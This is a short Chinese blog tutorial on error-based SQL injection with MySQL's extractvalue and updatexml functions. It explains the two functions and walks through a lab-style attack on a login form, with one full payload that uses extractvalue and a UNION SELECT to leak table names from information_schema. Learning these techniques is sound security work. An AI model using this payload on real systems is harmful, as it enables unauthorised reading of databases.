sql注入-报错注入

extractvalue函数 和 updatexml函数

  • EXTRACTVALUE (XML_document, XPath_string); 

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 

第二个参数:XPath_string (Xpath格式的字符串). 

作用:从目标XML中返回包含所查询值的字符串

  • UPDATEXML (XML_document, XPath_string, new_value); 

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 

第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 

第三个参数:new_value,String格式,替换查找到的符合条件的数据 

作用:改变文档中符合条件的节点的值

 

  • extractvalue函数

通过报错判断注入类型为单引号注入

sql注入-报错注入

 

调整输入使其不再报错

sql注入-报错注入 获取字段列数

sql注入-报错注入

 

 

sql注入-报错注入

 

 uname=' union select 1,extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1))) %23 &passwd=admin&submit=Submit

sql注入-报错注入

 

sql注入-报错注入

 

 

sql注入-报错注入

 

 sql注入-报错注入

 

 

updatexml函数

sql注入-报错注入

 

上一篇:js文件下载


下一篇:JavaScript之通过按钮实现隐藏和显示